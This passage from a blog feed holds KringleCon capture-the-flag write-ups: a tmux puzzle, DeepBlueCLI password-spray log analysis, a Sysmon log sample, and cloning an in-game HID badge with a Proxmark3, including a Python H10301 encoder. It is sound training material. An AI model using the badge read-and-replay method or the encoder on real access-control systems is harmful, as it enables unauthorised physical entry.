&lt;/code>&lt;/pre>&lt;/div>&lt;p>Now you can submit the string &lt;strong>DEMAND&lt;/strong> in the input field on your personal badge to solve the objective.&lt;/p></description></item><item><title>Operate the Santavator</title><link>https://flrnks.netlify.app/tutorials/kringlecon2020/objective4/</link><pubDate>Thu, 24 Dec 2020 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2020/objective4/</guid><description>&lt;p>&lt;img src="../images/obj4/objective4.png" alt="Objective4">&lt;/p>
&lt;p>This objective leads me back to the Kringle Castle&amp;rsquo;s &lt;strong>Front Lawn&lt;/strong> to talk with &lt;code>Pepper Minstix&lt;/code> for hints on operating the Santavator, provided I help with his terminal first:&lt;/p>
&lt;p>&lt;img src="../images/obj4/pepper-minstix.png" alt="Pepper Minstix">&lt;/p>
&lt;blockquote>
&lt;p>Howdy - Pepper Minstix here!
I&amp;rsquo;ve been playing with tmux lately, and golly it&amp;rsquo;s useful.
Problem is: I somehow became detached from my session.
Do you think you could get me back to where I was, admiring a beautiful bird?
If you find it handy, there&amp;rsquo;s a tmux cheat sheet you can use as a reference.
I hope you can help!&lt;/p>
&lt;/blockquote>
&lt;p>I think this was the simplest one so far. Reading up on
&lt;a href="https://tmuxcheatsheet.com/" target="_blank" rel="noopener">tmux&lt;/a>, I found a way to list all sessions by issuing &lt;code>tmux ls&lt;/code>, which revealed that one session had been created recently:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln">1&lt;/span>elf@6da9144bb25b:~$ tmux ls
&lt;span class="hl">&lt;span class="ln">2&lt;/span>0: &lt;span class="m">1&lt;/span> windows &lt;span class="o">(&lt;/span>created Sun Dec &lt;span class="m">27&lt;/span> 10:28:11 2020&lt;span class="o">)&lt;/span> &lt;span class="o">[&lt;/span>80x24&lt;span class="o">]&lt;/span>
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Next I tried &lt;code>tmux attach&lt;/code>, which revealed the colorful birdie:&lt;/p>
&lt;p>&lt;img src="../images/obj4/birdie.png" alt="TMUX Birdie">&lt;/p>
&lt;p>Talking again with &lt;code>Pepper Minstix&lt;/code> rewarded me with the below hints for the main objective:&lt;/p>
&lt;blockquote>
&lt;p>You found her! Thanks so much for getting her back!
Hey, maybe I can help YOU out!
There&amp;rsquo;s a Santavator that moves visitors from floor to floor, but it&amp;rsquo;s a bit wonky.
You&amp;rsquo;ll need a key and other odd objects. Try talking to Sparkle Redberry about the key.
For the odd objects, maybe just wander around the castle and see what you find on the floor.
Once you have a few, try using them to split, redirect, and color the Super Santavator Sparkle Stream (S4).&lt;/p>
&lt;/blockquote>
&lt;p>Next, I enter the Kringle Castle through the main entrance to talk with &lt;code>Sparkle Redberry&lt;/code> about the Santavator:&lt;/p>
&lt;p>&lt;img src="../images/obj4/sparkle-redberry.png" alt="Sparkle Redberry">&lt;/p>
&lt;blockquote>
&lt;p>Hey hey, Sparkle Redberry here!
The Santavator is on the fritz. Something with the wiring is grinchy, but maybe you can rig something up?
Here&amp;rsquo;s the key! Good luck!
On another note, I heard Santa say that he was thinking of canceling KringleCon this year!
At first, I thought it was a joke, but he seemed serious. I’m glad he changed his mind.
Have you had a chance to look at the Santavator yet?
With that key, you can look under the panel and see the Super Santavator Sparkle Stream (S4).
To get to different floors, you&amp;rsquo;ll need to power the various colored receivers.
&amp;hellip; There MAY be a way to bypass the S4 stream.&lt;/p>
&lt;/blockquote>
&lt;p>There&amp;rsquo;s also one hint in the badge for the main objective:&lt;/p>
&lt;ul>
&lt;li>It&amp;rsquo;s really more art than science. The goal is to put the right colored light into the receivers on the left and top of the panel.&lt;/li>
&lt;/ul>
&lt;p>Next I look around the castle to find the objects that will help me fix the wonky Santavator. Specifically, I need to recover some colorful light bulbs and a Hex Nut, which help steer the electrons and paint them the correct color:&lt;/p>
&lt;p>&lt;img src="../images/obj4/santavator-init.png" alt="santavator-quick-fix">&lt;/p>
&lt;p>One of the light bulbs cannot be found until reaching the &lt;strong>Speaker Unprep Room&lt;/strong> on the 2nd Floor, and it&amp;rsquo;s not possible to get to that floor until I tweak the Santavator to take me there. Luckily the green bulb and the Hex Nut are easy to find and are enough to complete this objective. Once enough green electrons were flying into the green receiver, I could close the lid and press the button for the 2nd floor:&lt;/p>
&lt;p>&lt;img src="../images/obj4/santavator-2nd-floor.png" alt="Second Floor">&lt;/p>
&lt;p>Which also completes this objective.&lt;/p>
&lt;p>On to the next one! 😎&lt;/p></description></item><item><title>Windows Log Analysis - Evaluate Attack Outcome</title><link>https://flrnks.netlify.app/tutorials/kringlecon2019/objective3/</link><pubDate>Sat, 28 Dec 2019 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2019/objective3/</guid><description>&lt;h2 id="find-the-sprayer">Find the sprayer!&lt;/h2>
&lt;p>Instructions from the badge:&lt;/p>
&lt;blockquote>
&lt;p>We&amp;rsquo;re seeing attacks against the Elf U domain!
Using the event log data, identify the user account that the attacker compromised using a password spray attack.
Bushy Evergreen is hanging out in the train station and may be able to help you out.&lt;/p>
&lt;/blockquote>
&lt;p>Link to Event logs: &lt;a href="https://downloads.elfu.org/Security.evtx.zip">https://downloads.elfu.org/Security.evtx.zip&lt;/a> (this file is binary, so a preview is not possible).&lt;/p>
&lt;h2 id="technical-challenge">Technical Challenge&lt;/h2>
&lt;p>If you need further help before solving this objective, head down to the &lt;strong>Train Station&lt;/strong> and talk with &lt;strong>Bushy Evergreen&lt;/strong>. He will be glad to help you, as long as you help him out with an issue with his terminal:&lt;/p>
&lt;p>&lt;img src="../images/obj3-bushy.png" alt="Bushy Evergreen">&lt;/p>
&lt;blockquote>
&lt;p>Hi, I&amp;rsquo;m Bushy Evergreen. Welcome to Elf U!
I&amp;rsquo;m glad you&amp;rsquo;re here. I&amp;rsquo;m the target of a terrible trick.
Pepper Minstix is at it again, sticking me in a text editor.
Pepper is forcing me to learn ed.
Even the hint is ugly. Why can&amp;rsquo;t I just use Gedit?
Please help me just quit the grinchy thing.&lt;/p>
&lt;/blockquote>
&lt;p>Click on the &lt;strong>TERMINAL&lt;/strong> next to him, and solve the presented problem:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash"> ........................................
.&lt;span class="p">;&lt;/span>oooooooooooool&lt;span class="p">;&lt;/span>,,,,,,,,:loooooooooooooll:
.:oooooooooooooc&lt;span class="p">;&lt;/span>,,,,,,,,:ooooooooooooollooo:
.&lt;span class="s1">&amp;#39;;;;;;;;;;;;;;;,&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&lt;/span>&lt;span class="p">;;;;;;;;;;;;;&lt;/span>,&lt;span class="p">;&lt;/span>ooooo:
.&lt;span class="s1">&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;;ooooo:
&lt;/span>&lt;span class="s1"> ;oooooooooooool;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&lt;/span>,:loooooooooooolc&lt;span class="p">;&lt;/span>&lt;span class="s1">&amp;#39;,,;ooooo:
&lt;/span>&lt;span class="s1"> .:oooooooooooooc;&amp;#39;&lt;/span>,,,,,,,:ooooooooooooolccoc,,,&lt;span class="p">;&lt;/span>ooooo:
.cooooooooooooo:,&lt;span class="s1">&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;,:ooooooooooooolcloooc,,,;ooooo,
&lt;/span>&lt;span class="s1">coooooooooooooo,,,,,,,,,;ooooooooooooooloooooc,,,;ooo,
&lt;/span>&lt;span class="s1">coooooooooooooo,,,,,,,,,;ooooooooooooooloooooc,,,;l&amp;#39;&lt;/span>
coooooooooooooo,,,,,,,,,&lt;span class="p">;&lt;/span>ooooooooooooooloooooc,,..
coooooooooooooo,,,,,,,,,&lt;span class="p">;&lt;/span>ooooooooooooooloooooc.
coooooooooooooo,,,,,,,,,&lt;span class="p">;&lt;/span>ooooooooooooooloooo:.
coooooooooooooo,,,,,,,,,&lt;span class="p">;&lt;/span>ooooooooooooooloo&lt;span class="p">;&lt;/span>
:llllllllllllll,&lt;span class="s1">&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&lt;/span>&lt;span class="p">;&lt;/span>llllllllllllllc,
Oh, many UNIX tools grow old, but this one&lt;span class="err">&amp;#39;&lt;/span>s showing gray.
That Pepper LOLs and rolls her eyes, sends mocking looks my way.
I need to exit, run - get out! - and celebrate the yule.
Your challenge is to &lt;span class="nb">help&lt;/span> this elf escape this blasted tool.
-Bushy Evergreen
Exit ed.
&lt;span class="m">1100&lt;/span>
q &lt;span class="o">&amp;lt;&amp;lt;&amp;lt;&lt;/span> &lt;span class="nb">type&lt;/span> q to &lt;span class="nb">exit&lt;/span>
Loading, please wait......
You did it! Congratulations!
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Okay, it was a rather simple issue&amp;hellip; However, it was good practice, as you will encounter similar &lt;strong>technical challenges&lt;/strong> down the road. Once you go back and click on Bushy, you will finally get your hints for solving this challenge:&lt;/p>
&lt;blockquote>
&lt;p>Wow, that was much easier than I&amp;rsquo;d thought.
Maybe I don&amp;rsquo;t need a clunky GUI after all!
Have you taken a look at the password spray attack artifacts?
I&amp;rsquo;ll bet that DeepBlueCLI tool is helpful.
You can check it out on GitHub.
It was written by that Eric Conrad.
He lives in Maine - not too far from here!&lt;/p>
&lt;/blockquote>
&lt;p>What he is essentially telling you is to use
&lt;a href="https://github.com/sans-blue-team/DeepBlueCLI" target="_blank" rel="noopener">this&lt;/a> tool to solve Objective 3. For this you will most likely need a Windows-based machine (physical or virtual does not matter). First clone the repository from GitHub, then download the &lt;code>Security.evtx&lt;/code> file provided in the objective description. Then execute the &lt;code>DeepBlue.ps1&lt;/code> script with this file as its first argument. Be sure to start the new PowerShell session as &lt;strong>ADMIN&lt;/strong>!&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">&lt;span class="c1"># command #1 set the execution policy unrestricted so we can call the DeepBlueCLI script&lt;/span>
$ Set-ExecutionPolicy unrestricted
&lt;span class="c1"># command #2&lt;/span>
$ .&lt;span class="se">\D&lt;/span>eepBlue.ps1 .&lt;span class="se">\S&lt;/span>ecurity.evtx
...
Date : 2019. 08. 24. 2:00:20
Log : Security
EventID : &lt;span class="m">4672&lt;/span>
Message : High number of logon failures &lt;span class="k">for&lt;/span> one account
Results : Username: supatree
Total logon failures: &lt;span class="m">76&lt;/span>
...
Date : 2019. 08. 24. 2:00:20
Log : Security
EventID : &lt;span class="m">4672&lt;/span>
Message : Multiple admin logons &lt;span class="k">for&lt;/span> one account
Results : Username: pminstix
User SID Access Count: &lt;span class="m">2&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>&lt;em>Full output can be seen in this PB document: &lt;a href="https://pastebin.com/X5LBNVCy">https://pastebin.com/X5LBNVCy&lt;/a>&lt;/em>&lt;/p>
&lt;p>After the DeepBlueCLI tool finishes processing the file, it produces a ton of output. Your task is to find the compromised account name and submit it through your personal badge to see if it is the right solution. When I was solving this challenge, I simply scrolled until I found the &lt;code>pminstix&lt;/code> and &lt;code>supatree&lt;/code> account names. I first tried the former, which did not work, and then tried the latter, which did, so Objective #3 is now solved!&lt;/p>
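&lt;p>Rather than scrolling by hand, the spray finding can be pulled out of DeepBlueCLI&amp;rsquo;s text output with a few lines of script. Below is a hypothetical Python sketch; the sample string mirrors the excerpt above, but the exact message wording may differ between DeepBlueCLI versions:&lt;/p>

```python
import re

# Hypothetical sample in the same shape as DeepBlueCLI's text output
sample = """
Message : High number of logon failures for one account
Results : Username: supatree
          Total logon failures: 76

Message : Multiple admin logons for one account
Results : Username: pminstix
"""

def find_sprayed_accounts(text: str) -> list:
    """Return usernames attached to 'High number of logon failures' findings."""
    hits = []
    lines = text.splitlines()
    for i, line in enumerate(lines):
        if "logon failures for one account" in line:
            # the username appears on the following 'Results' line
            m = re.search(r"Username:\s*(\S+)", lines[i + 1])
            if m:
                hits.append(m.group(1))
    return hits

print(find_sprayed_accounts(sample))  # ['supatree']
```

This would have surfaced &lt;code>supatree&lt;/code> directly, skipping the admin-logon noise around &lt;code>pminstix&lt;/code>.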
&lt;p>One could probably write a more sophisticated script to parse and search for the answer, but simple ways can sometimes lead to quicker solutions&amp;hellip; :)&lt;/p></description></item><item><title>Open HID Lock</title><link>https://flrnks.netlify.app/tutorials/kringlecon2020/objective5/</link><pubDate>Thu, 24 Dec 2020 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2020/objective5/</guid><description>&lt;p>&lt;img src="../images/obj5/objective5.png" alt="Objective5">&lt;/p>
&lt;p>Once I figured out how to operate the Santavator, I went up to the 2nd floor where I find several rooms hosting the virtual KringleCon Talks as well as &lt;code>Bushy Evergreen&lt;/code>. He&amp;rsquo;s supposed to give hints for solving the main objective, but first he desperately needs my help getting into the Speaker Unpreparedness Room:&lt;/p>
&lt;p>&lt;img src="../images/obj5/bushy-evergreen.png" alt="Bushy Evergreen">&lt;/p>
&lt;blockquote>
&lt;p>Ohai! Bushy Evergreen, just trying to get this door open.
It&amp;rsquo;s running some Rust code written by Alabaster Snowball.
I&amp;rsquo;m pretty sure the password I need for ./door is right in the executable itself.
Isn&amp;rsquo;t there a way to view the human-readable strings in a binary file?&lt;/p>
&lt;/blockquote>
&lt;p>Opening the door was quite easy with his tip on the use of the &lt;code>strings&lt;/code> utility on the main binary executable:&lt;/p>
&lt;p>&lt;img src="../images/obj5/door-unlock.png" alt="Door Unlock Terminal Challenge">&lt;/p>
&lt;p>After the door was finally open, Bushy asks if I would like to help some more by turning on the lights in the room. Somehow this is not as trivial as it sounds:&lt;/p>
&lt;blockquote>
&lt;p>That&amp;rsquo;s it! What a great password&amp;hellip;
Hey, you want to help me figure out the light switch too? Those come in handy sometimes.
The password we need is in the lights.conf file, but it seems to be encrypted.
There&amp;rsquo;s another instance of the program and configuration in ~/lab/ you can play around with.
What if we set the user name to an encrypted value?&lt;/p>
&lt;/blockquote>
&lt;p>Paying closer attention to the last sentence, the solution was quite straight-forward:&lt;/p>
&lt;p>&lt;img src="../images/obj5/lights-on.png" alt="Turn On Lights Sub-Challenge">&lt;/p>
&lt;p>Finally, he asks for help with the vending machine so speakers can get their snacks and beverages:&lt;/p>
&lt;blockquote>
&lt;p>Wow - that worked? I mean, it worked! Hooray for opportunistic decryption, I guess!
So hey, if you want, there&amp;rsquo;s one more challenge.
You see, there&amp;rsquo;s a vending machine in there that the speakers like to use sometimes.
Play around with ./vending_machines in the lab folder.
You know what might be worth trying? Delete or rename the config file and run it.
Then you could set the password yourself to AAAAAAAA or BBBBBBBB.
If the encryption is simple code book or rotation ciphers, you&amp;rsquo;ll be able to roll back the original password.&lt;/p>
&lt;/blockquote>
&lt;p>Solving this one required some more craftiness, but brute-forcing the PW was not that difficult:&lt;/p>
&lt;p>&lt;img src="../images/obj5/vending-machine.png" alt="Vending Machine Sub-Challenge">&lt;/p>
&lt;blockquote>
&lt;p>Your lookup table worked - great job! That&amp;rsquo;s one way to defeat a polyalphabetic cipher!
Good luck navigating the rest of the castle.&lt;/p>
&lt;/blockquote>
&lt;p>At long last, below are the various hints from Bushy for solving these challenges:&lt;/p>
&lt;blockquote>
&lt;p>Santa asked me to ask you to evaluate the security of our new HID lock.
If ever you find yourself in possession of a Proxmark3, click it in your badge to interact with it.
It&amp;rsquo;s a slick device that can read others&amp;rsquo; badges!
Oh, did I mention that the Proxmark can simulate badges? Cool, huh?
There are lots of references online to help.
In fact, there&amp;rsquo;s a talk going on right now!
So hey, if you want, there&amp;rsquo;s one more challenge.
And that Proxmark thing? Some people scan other people&amp;rsquo;s badges and try those codes at locked doors.
Other people scan one or two and just try to vary room numbers.
Do whatever works best for you!&lt;/p>
&lt;/blockquote>
&lt;p>Now it was time to enter the room next to &lt;code>Bushy&lt;/code> and see what was hiding in there. With the lights turned on it was easy to spot an item lying on the ground; I&amp;rsquo;m sure it will be useful for tweaking the Santavator later on. Also, clicking the vending machine a few times rewards you with some new items.&lt;/p>
&lt;p>Before turning to the main objective, I went to the Kitchen to help &lt;code>Fitzy Shortstack&lt;/code> with the Dial-Up Terminal that controls the internet connected X-mas lights:&lt;/p>
&lt;p>&lt;img src="../images/obj5/fitzy-shortstack.png" alt="Fitzy Shortstack">&lt;/p>
&lt;blockquote>
&lt;p>&amp;ldquo;Put it in the cloud,&amp;rdquo; they said&amp;hellip;
&amp;ldquo;It&amp;rsquo;ll be great,&amp;rdquo; they said&amp;hellip;
All the lights on the Christmas trees throughout the castle are controlled through a remote server.
We can shuffle the colors of the lights by connecting via dial-up, but our only modem is broken!
Fortunately, I speak dial-up. However, I can&amp;rsquo;t quite remember the handshake sequence.
Maybe you can help me out? The phone number is 756-8347; you can use this blue phone.&lt;/p>
&lt;/blockquote>
&lt;p>I proceed to listen to
&lt;a href="https://upload.wikimedia.org/wikipedia/commons/3/33/Dial_up_modem_noises.ogg" target="_blank" rel="noopener">THIS&lt;/a> recording to figure out the handshake sequence.&lt;/p>
&lt;p>Eventually I found the correct sequence:&lt;/p>
&lt;ol>
&lt;li>ba DEE brrr&lt;/li>
&lt;li>aahh&lt;/li>
&lt;li>WEWEWwrwrwrr&lt;/li>
&lt;li>beDURRdunditty&lt;/li>
&lt;li>SCHHRRHHRTHRTR&lt;/li>
&lt;/ol>
&lt;p>&lt;img src="../images/obj5/dial-up.png" alt="Dial-Up Challenge">&lt;/p>
&lt;p>Which earns me this new hint:&lt;/p>
&lt;blockquote>
&lt;p>You know, Santa really seems to trust Shinny Upatree&amp;hellip;&lt;/p>
&lt;/blockquote>
&lt;p>Which doesn&amp;rsquo;t make too much sense at first, but earlier I learnt from &lt;code>Bushy&lt;/code> that a &lt;strong>ProxMark3&lt;/strong> device will be essential for opening the HID lock. It can be used to clone and replay RFID badges that can open the door in the Workshop. Maybe &lt;code>Shinny&lt;/code> is the one whose badge I should try to steal with the &lt;strong>ProxMark3&lt;/strong>?&lt;/p>
&lt;p>Let&amp;rsquo;s find out!&lt;/p>
&lt;p>Next I head back to the Santavator and use the new items I found in the &lt;strong>Speaker Unpreparedness Room&lt;/strong> to unlock the journey up to the &lt;code>Workshop&lt;/code>!&lt;/p>
&lt;p>&lt;img src="../images/obj5/santavator.png" alt="Santavator">&lt;/p>
&lt;p>Upon entering, I check the small &lt;code>Wrapping Room&lt;/code> where I find the &lt;strong>ProxMark3&lt;/strong> I needed so much! I try to study it a bit by reading the short list of commands given in the badge:&lt;/p>
&lt;ul>
&lt;li>Larry Pesce knows a thing or two about
&lt;a href="https://www.youtube.com/watch?v=647U85Phxgo" target="_blank" rel="noopener">HID attacks&lt;/a>. He&amp;rsquo;s the author of a course on wireless hacking!&lt;/li>
&lt;li>Short list of essential proxmark commands
&lt;a href="https://gist.github.com/joswr1ght/efdb669d2f3feb018a22650ddc01f5f2" target="_blank" rel="noopener">HERE&lt;/a>&lt;/li>
&lt;/ul>
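&lt;p>Some background that helped me make sense of the Proxmark output: HID Prox badges commonly use the 26-bit H10301 layout, i.e. an even-parity bit, an 8-bit facility code, a 16-bit card number, and an odd-parity bit. A Python sketch of that encoding (an assumption on my part; the writeup doesn&amp;rsquo;t state which format the castle badges use, and the facility/card values below are made up):&lt;/p>

```python
def encode_h10301(facility: int, card: int) -> int:
    """Pack an 8-bit facility code and 16-bit card number into the
    common 26-bit H10301 HID layout: EP | FC(8) | CN(16) | OP."""
    data = (facility << 16) | card                      # 24 data bits
    bits = [(data >> (23 - i)) & 1 for i in range(24)]
    ep = sum(bits[:12]) % 2          # even parity over the first 12 data bits
    op = (sum(bits[12:]) + 1) % 2    # odd parity over the last 12 data bits
    return (ep << 25) | (data << 1) | op

def decode_h10301(raw: int) -> tuple:
    card = (raw >> 1) & 0xFFFF
    facility = (raw >> 17) & 0xFF
    return facility, card

raw = encode_h10301(113, 6023)   # hypothetical facility code / card number
print(decode_h10301(raw))  # (113, 6023)
```

This is also why the "just vary room numbers" hint works: with only 8 + 16 data bits and deterministic parity, neighboring card numbers are trivial to synthesize and simulate.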
&lt;p>After watching that KringleCon talk on HID Card Hacking and reading the cheat-sheet, I head back to the Castle&amp;rsquo;s &lt;strong>Front Lawn&lt;/strong> to try to steal &lt;code>Shinny's&lt;/code> RFID card details with the command &lt;code>lf hid read&lt;/code>:&lt;/p>
&lt;p>&lt;img src="../images/obj5/hid-read-shinny.png" alt="Trusted Shinny">&lt;/p>
&lt;p>That looks great! Now I go back to the &lt;code>Workshop&lt;/code>, I stand next to the HID protected door to replay &lt;code>Shinny's&lt;/code> card parameters with the &lt;strong>ProxMark3&lt;/strong>:&lt;/p>
&lt;p>&lt;img src="../images/obj5/hid-sim-shinny.png" alt="Cloned Shinny">&lt;/p>
&lt;p>Well that worked flawlessly! Let&amp;rsquo;s see what&amp;rsquo;s in this room.&lt;/p>
&lt;p>Hmmm&amp;hellip; it seems to be just dark and empty but with a really
&lt;a href="https://holidayhackchallenge.com/2020/album/Mary%20Ellen%20Kennel%20-%20I%20Wish%20I%20Could%20be%20Santa%20Claus.mp3" target="_blank" rel="noopener">NICE&lt;/a> song! I stop for a moment to appreciate it.&lt;/p>
&lt;p>Then I check if there is anything down there. Ohhhhhhhh wait&amp;hellip; I&amp;rsquo;ve become Santa himself?! 😱&lt;/p>
&lt;p>&lt;img src="../images/obj5/new-santa.png" alt="NewSanta">&lt;/p>
&lt;p>On to the next objective
&lt;a href="https://holidayhackchallenge.com/2020/album/Skoudis%20-%20Is%20That%20You%20Santa%20Clause.mp3" target="_blank" rel="noopener">🎅🏻&lt;/a>!&lt;/p></description></item><item><title>Windows Log Analysis - Determine Attacker Technique</title><link>https://flrnks.netlify.app/tutorials/kringlecon2019/objective4/</link><pubDate>Sat, 28 Dec 2019 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2019/objective4/</guid><description>&lt;h2 id="un-redact-that-thing">Un-redact that thing!&lt;/h2>
&lt;p>Instructions from the badge:&lt;/p>
&lt;blockquote>
&lt;p>Using these normalized Sysmon logs, identify the tool the attacker used to retrieve domain password hashes from the lsass.exe process. For hints on achieving this objective, please visit Hermey Hall and talk with SugarPlum Mary.&lt;/p>
&lt;/blockquote>
&lt;p>Link to the
&lt;a href="https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon" target="_blank" rel="noopener">SysMon&lt;/a>
&lt;a href="https://downloads.elfu.org/sysmon-data.json.zip" target="_blank" rel="noopener">logs&lt;/a> and below you can see some sample data:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-json" data-lang="json">&lt;span class="p">{&lt;/span>
&lt;span class="nt">&amp;#34;command_line&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="s2">&amp;#34;cmd.exe /c echo besewi &amp;gt; \\\\.\\pipe\\besewi&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;event_type&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="s2">&amp;#34;process&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;logon_id&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="mi">999&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;parent_process_name&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="s2">&amp;#34;services.exe&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;parent_process_path&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="s2">&amp;#34;C:\\Windows\\System32\\services.exe&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;pid&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="mi">3812&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;ppid&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="mi">616&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;process_name&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="s2">&amp;#34;cmd.exe&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;process_path&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="s2">&amp;#34;C:\\Windows\\System32\\cmd.exe&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;subtype&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="s2">&amp;#34;create&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;timestamp&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="mi">132186397959850000&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;unique_pid&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="s2">&amp;#34;{7431d376-deb3-5dd3-0000-001096a84f00}&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;unique_ppid&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="s2">&amp;#34;{7431d376-cd7f-5dd3-0000-001010910000}&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;user&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="s2">&amp;#34;NT AUTHORITY\\SYSTEM&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;user_domain&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="s2">&amp;#34;NT AUTHORITY&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;user_name&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="s2">&amp;#34;SYSTEM&amp;#34;&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;h2 id="technical-challenge">Technical Challenge&lt;/h2>
&lt;p>To get some further hints for solving this challenge, you are told to talk with SugarPlum Mary in Hermey Hall. She is ready to give you some advice, as long as you help her first with an issue she is having with her terminal:&lt;/p>
&lt;p>&lt;img src="../images/obj4-mary.png" alt="SugarPlum Mary">&lt;/p>
&lt;blockquote>
&lt;p>Oh me oh my - I need some help!
I need to review some files in my Linux terminal, but I can&amp;rsquo;t get a file listing.
I know the command is ls, but it&amp;rsquo;s really acting up.
Do you think you could help me out? As you work on this, think about these questions:&lt;/p>
&lt;ol>
&lt;li>Do the words in green have special significance?&lt;/li>
&lt;li>How can I find a file with a specific name?&lt;/li>
&lt;li>What happens if there are multiple executables with the same name in my $PATH?&lt;/li>
&lt;/ol>
&lt;/blockquote>
&lt;p>When you click to view her terminal you get the following information:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">K000K000K000KK0KKKKKXKKKXKKKXKXXXXXNXXXX0kOKKKK0KXKKKKKKK0KKK0KK0KK0KK0KK0KK0KKKKKK
00K000KK0KKKKKKKKKXKKKXKKXXXXXXXXNXXNNXXooNOXKKXKKXKKKXKKKKKKKKKK0KKKKK0KK0KK0KKKKK
KKKKKKKKKKKXKKXXKXXXXXXXXXXXXXNXNNNNNNK0x:xoxOXXXKKXXKXXKKXKKKKKKKKKKKKKKKKKKKKKKKK
K000KK00KKKKKKKKXXKKXXXXNXXXNXXNNXNNNNNWk.ddkkXXXXXKKXKKXKKXKKXKKXKKXK0KK0KK0KKKKKK
00KKKKKKKKKXKKXXKXXXXXNXXXNXXNNNNNNNNWXXk,ldkOKKKXXXXKXKKXKKXKKXKKKKKKKKKK0KK0KK0XK
KKKXKKKXXKXXXXXNXXXNXXNNXNNNNNNNNNXkddk0No,&lt;span class="p">;;&lt;/span>:oKNK0OkOKXXKXKKXKKKKKKKKKKKKK0KK0KKKX
0KK0KKKKKXKKKXXKXNXXXNXXNNXNNNNXxl&lt;span class="p">;&lt;/span>o0NNNo,,,&lt;span class="p">;;;;&lt;/span>KWWWN0dlk0XXKKXKKXKKXKKKKKKKKKKKKKK
KKKKKKKKXKXXXKXXXXXNXXNNXNNNN0o&lt;span class="p">;;&lt;/span>lKNNXXl,,,,,,,,cNNNNNNKc&lt;span class="p">;&lt;/span>oOXKKXKKXKKXKKXKKKKKKKKKK
XKKKXKXXXXXXNXXNNXNNNNNNNNN0l&lt;span class="p">;&lt;/span>,cONNXNXc&lt;span class="s1">&amp;#39;,,,,,,,,,KXXXXXNNl,;oKXKKXKKKKKK0KKKKK0KKKX
